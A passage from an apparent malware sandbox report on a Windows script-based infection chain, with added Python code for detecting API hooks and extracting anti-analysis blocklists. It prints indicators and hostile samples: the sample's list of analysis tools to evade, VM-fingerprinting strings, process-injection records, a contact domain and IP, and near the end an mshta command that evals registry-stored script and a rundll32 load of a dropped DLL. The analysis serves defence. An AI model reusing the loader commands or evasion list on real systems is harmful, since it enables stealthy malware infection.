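    """Inline-hook check: compare the mapped prolog with the (relocated) on-disk
    bytes.  A difference plus a decoded stub is strong evidence; a difference
    with no recognised stub still deserves a manual look."""
    n = min(len(on_disk), len(in_memory))
    first_diff = next((i for i in range(n) if on_disk[i] != in_memory[i]), None)
    return {
        "modified": first_diff is not None,
        "first_diff": first_diff,
        "stub": classify_trampoline(in_memory, function_va) if first_diff is not None else None,
    }


def owner_of(addr: int, modules: Dict[str, Tuple[int, int]]) -> Optional[str]:
    """Loaded module whose [base, base+size) contains addr, or None for unbacked memory."""
    for name, (base, size) in modules.items():
        if base <= addr < base + size:
            return name
    return None


def check_pointer(entry: str, addr: int, expected: str, modules: Dict[str, Tuple[int, int]]) -> Dict:
    """EAT/IAT check: an export or import slot should resolve into the module
    that implements the function.  Forwarded exports and API-set stubs
    legitimately land in another module (kernel32 -> kernelbase), so that is
    'review'; a pointer into memory backed by no module at all is a hook."""
    owner = owner_of(addr, modules)
    if owner is None:
        verdict = "hooked"
    elif owner.lower() == expected.lower():
        verdict = "ok"
    else:
        verdict = "review"
    return {"entry": entry, "address": addr, "owner": owner, "verdict": verdict}


# Constructed layout: two legitimate modules; 0x1BF36100000 is backed by no module.
MODULES = {"KERNEL32.DLL": (0x7FFC10000000, 0xC0000), "KERNELBASE.dll": (0x7FFC0FD00000, 0x2F0000)}
FUNCTION_VA = 0x7FFC10035200                                     # constructed CreateProcessAsUserW address
PROLOG_DISK = bytes.fromhex("48895C240848896C2410")              # mov [rsp+8],rbx ; mov [rsp+10h],rbp
PROLOG_HOOKED = b"\x48\xB8" + struct.pack("<Q", 0x1BF36100540) + b"\xFF\xE0"  # mov rax, target ; jmp rax


def run_demo() -> Dict:
    return {
        "clean": check_prolog(PROLOG_DISK, PROLOG_DISK, FUNCTION_VA),
        "inline": check_prolog(PROLOG_DISK, PROLOG_HOOKED, FUNCTION_VA),
        "eat": check_pointer("KERNEL32.DLL!CreateProcessAsUserW", 0x1BF36100540, "KERNEL32.DLL", MODULES),
        "iat": check_pointer("WININET.dll -> CreateProcessW", 0x7FFC10045678, "KERNEL32.DLL", MODULES),
        "fwd": check_pointer("KERNEL32.DLL!CreateProcessW (forwarded)", 0x7FFC0FE01000, "KERNEL32.DLL", MODULES),
    }


if __name__ == "__main__":
    for name, result in run_demo().items():
        print(name, result)
```

Two caveats when feeding real dumps: take the on-disk bytes after applying relocations (x64 prologs are almost always rip-relative, but not always), and resolve API-set names to their host DLL before comparing the owner, otherwise every `api-ms-win-*` import shows up as 'review'.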
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Key value created or modified: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550 UtilDate
Source: C:\Windows\System32\wscript.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\System32\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\SysWOW64\rundll32.exe | Process information set: NOOPENFILEERRORBOX (5 occurrences)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (90 occurrences)
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\control.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: AUTORUNSC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: EMUL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: SBIECTRL.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: APISPY.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: $FAKEHTTPSERVER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: REGMON.EXEIK
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: WINDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: SBIESVC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: SCKTOOL.EXE;HQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: IDAQ.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: IMPORTREC.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: IMUL.EXE.8
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: WINDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: Q?$SANDBOXIERPCSS.EXEV5
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: PEID.EXE#Z
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: SYSANALYZER.EXEA
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: PETOOLS.EXEJ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: PROCMON.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: OLLYDBG.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: HOOKEXPLORER.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: NETSNIFFER.EXEK
Source: wscript.exe, 00000001.00000003.572498942.0000017634237000.00000004.00000001.sdmp | Binary or memory string: D"WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: AUTORUNS.EXE@
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: HOOKANAAPP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: TCPDUMP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: FILEMON.EXET
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: A9$BEHAVIORDUMPER.EXEQ
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: IDAG.EXE:V
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: REGSHOT.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: DUMPCAP.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: WIRESHARK.EXE
Source: wscript.exe, 00000001.00000003.535587225.000001763828D000.00000004.00000001.sdmp | Binary or memory string: FORTITRACER.EXEA
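Static triage for the analysis-tool blocklist and the WMI hardware queries that the memory strings above reveal, as an added example that is not code from the report. It folds VBScript string concatenations first, then lists quoted process names and `Win32_` classes so the full list can be recovered from the script rather than from scattered memory strings. The `Chr()`/`&` folding targets a common VBScript obfuscation idiom and is an assumption about this sample, whose source the report does not reproduce; `SAMPLE_SCRIPT` is a constructed fragment that reuses a few names from the strings above and is not the actual 345678.vbs.

```python
"""Pull an anti-analysis process blocklist and WMI fingerprinting queries out of script text.
Added example; SAMPLE_SCRIPT is constructed, and the Chr()/& folding is an assumed idiom."""
import re
from typing import Dict, List

TOKEN = r'(?:"[^"]*"|Chr\(\s*\d+\s*\))'                        # string literal or Chr(n)
CHAIN_RE = re.compile(TOKEN + r"(?:\s*&\s*" + TOKEN + r")+", re.IGNORECASE)
CHR_RE = re.compile(r"Chr\(\s*(\d+)\s*\)", re.IGNORECASE)
QUOTED_RE = re.compile(r'"([^"]*)"')
EXE_RE = re.compile(r"^[\w.\-]+\.EXE$")
WMI_CLASS_RE = re.compile(r"\bWin32_\w+", re.IGNORECASE)
# Classes that only make sense for fingerprinting the host; assumption, extend to taste.
HARDWARE_CLASSES = {"win32_computersystem", "win32_processor", "win32_bios",
                    "win32_diskdrive", "win32_videocontroller"}


def fold_strings(script: str) -> str:
    """Replace "lit" & Chr(n) & "lit" chains with one literal so a split name
    such as "SBIE" & Chr(83) & "VC.EXE" becomes "SBIESVC.EXE".  Doubled quotes
    inside literals ("") are not interpreted; a chain that also contains a
    variable is left alone because its value is not known statically."""
    def fold(match):
        parts = []
        for tok in re.findall(TOKEN, match.group(0), flags=re.IGNORECASE):
            if tok.startswith('"'):
                parts.append(tok[1:-1])
            else:
                parts.append(chr(int(CHR_RE.match(tok).group(1))))
        return '"' + "".join(parts) + '"'
    return CHAIN_RE.sub(fold, script)


def extract_process_blocklist(script: str) -> List[str]:
    """Quoted *.EXE names, upper-cased, de-duplicated, in first-seen order."""
    names, seen = [], set()
    for s in QUOTED_RE.findall(fold_strings(script)):
        s = s.strip().upper()
        if EXE_RE.match(s) and s not in seen:
            seen.add(s)
            names.append(s)
    return names


def wmi_classes(script: str) -> List[str]:
    """Win32_ classes referenced anywhere, de-duplicated case-insensitively."""
    found: Dict[str, str] = {}
    for m in WMI_CLASS_RE.findall(fold_strings(script)):
        found.setdefault(m.lower(), m)
    return sorted(found.values(), key=str.lower)


def triage(script: str) -> Dict:
    names = extract_process_blocklist(script)
    classes = wmi_classes(script)
    fingerprinting = [c for c in classes if c.lower() in HARDWARE_CLASSES]
    return {
        "process_blocklist": names,
        "wmi_classes": classes,
        "hardware_fingerprinting": fingerprinting,
        # assumption: five or more tool names, or hardware classes next to a
        # process list, marks a blocklist rather than an incidental reference
        "anti_analysis": len(names) >= 5 or (bool(fingerprinting) and bool(names)),
    }


SAMPLE_SCRIPT = r'''
Dim tools, wmi, cs, cpu, procs
tools = Array("WIRESHARK.EXE", "PROCMON.EXE", "OLLYDBG.EXE", "REGSHOT.EXE", "TCPDUMP.EXE", "SBIE" & Chr(83) & "VC.EXE")
Set wmi = GetObject("winmgmts:\\.\root\cimv2")
Set cs = wmi.ExecQuery("Select * from Win32_ComputerSystem")
Set cpu = wmi.ExecQuery("Select * from Win32_Processor")
Set procs = wmi.ExecQuery("Select Name from Win32_Process")
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

Run it over the deobfuscated script, not the raw dropper: string tables built with `Split`, array indexing or `Execute` are out of scope here and need the script's own decoder run first.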
Source: C:\Windows\System32\wscript.exe TID: 3256 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6380 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2968
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6236
Source: C:\Windows\SysWOW64\rundll32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\uitt4j30\uitt4j30.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.dll
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 21_2_05591802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05591802
Source: mshta.exe, 0000001E.00000003.636430270.0000014A8EE78000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\-
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.695253340.0000000003710000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}85-ab02-99bb52d3fb8b}\InstaB^
                    Source: explorer.exe, 00000025.00000000.714478354.0000000003767000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: 0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BU
                    Source: RuntimeBroker.exe, 00000027.00000000.747653122.000002413A440000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}-0E2F-4A16-A381-3E560C68BC8B
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
                    Source: explorer.exe, 00000025.00000000.686843067.000000000DC31000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bc
                    Source: explorer.exe, 00000025.00000000.712725595.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
                    Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
                    Source: rundll32.exe, 00000015.00000003.621150182.00000000008E3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
                    Source: explorer.exe, 00000025.00000000.729862046.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
                    Source: explorer.exe, 00000025.00000000.715825967.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
                    Source: mshta.exe, 0000001E.00000003.636522646.0000014A8EE47000.00000004.00000001.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05581577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05581577
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_055714A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_055714A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05586E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05586E4E
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05585529 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,21_2_05585529
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeProcess created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServerJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05592A09 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,21_2_05592A09

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe | Domain query: atl.bigbigpoppa.com
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.251.90.253 80
Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: fum.cpp.1.dr
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\explorer.exe | Section loaded: unknown target: C:\Windows\System32\RuntimeBroker.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\System32\control.exe | Section loaded: unknown target: C:\Windows\System32\rundll32.exe protection: execute and read and write
Compiles code for process injection (via .Net compiler)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File written: C:\Users\user\AppData\Local\Temp\wyozc5bn\wyozc5bn.0.cs
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\rundll32.exe | Memory allocated: C:\Windows\System32\control.exe base: 160000 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory allocated: C:\Windows\System32\rundll32.exe base: 195D87A0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread created: C:\Windows\explorer.exe EIP: 9B851580
Source: C:\Windows\explorer.exe | Thread created: C:\Windows\System32\RuntimeBroker.exe EIP: 9B851580
Source: C:\Windows\System32\control.exe | Thread created: unknown EIP: 9B851580
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 160000
Source: C:\Windows\SysWOW64\rundll32.exe | Memory written: C:\Windows\System32\control.exe base: 7FF64DBB12E0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: ED6000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 2AD0000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\explorer.exe base: 7FFA9B851580
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 46DA8FD000
Source: C:\Windows\explorer.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 195D87A0000
Source: C:\Windows\System32\control.exe | Memory written: C:\Windows\System32\rundll32.exe base: 7FF616D15FD0
Changes memory attributes in foreign processes to executable or writable
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\explorer.exe | Memory protected: C:\Windows\System32\RuntimeBroker.exe base: 7FFA9B851580 protect: page execute read
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Source: C:\Windows\System32\control.exe | Memory protected: unknown base: 7FFA9B851580 protect: page execute and read and write
Injects code into the Windows Explorer (explorer.exe)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: ED6000 value: 00
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 7FFA9B851580 value: EB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 2AD0000 value: 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: PID: 3472 base: 7FFA9B851580 value: 40
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 2896
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe | Thread register set: target process: 3472
Source: C:\Windows\System32\control.exe | Thread register set: target process: 4612
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Rm6e='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Rm6e).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
